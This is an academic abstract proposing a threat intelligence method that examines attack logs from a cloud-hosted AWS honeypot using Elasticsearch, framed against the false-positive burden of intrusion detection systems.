Analysis of Honeypot Data utilizing Elasticsearch for Cyber Threat Intelligence
In a real-time environment there are more cyber-attacks arising which require cybersecurity specialists to identify, investigate and protect from the cyber threats. In general, the timely managing of such a huge number of attacks is not feasible without thoroughly analyzing the features of the threat and taking appropriate intelligent protective measures in which it defines the term cyber threat intelligence. However, this is not a simplistic method, since the IDSs produce a significant volume of notifications that might or may not be correct eventually leading to a significant number of false positives. It is difficult to avoid cyber threats just by existing utilizing tools and techniques. Instead the analysis has been done for how the attacker’s intension would evaluating via various means such as Indicator of Compromise (IoC). In this article, a new threat intelligence technique has been proposed to examine the log data of honeypots to detect the attacker’s activities an attacker’s target and acts as an objective, to accomplish this objective honeypot AWS has been installed in the cloud to obtain cyber incident log and the elastic search technology is used to examine the log data.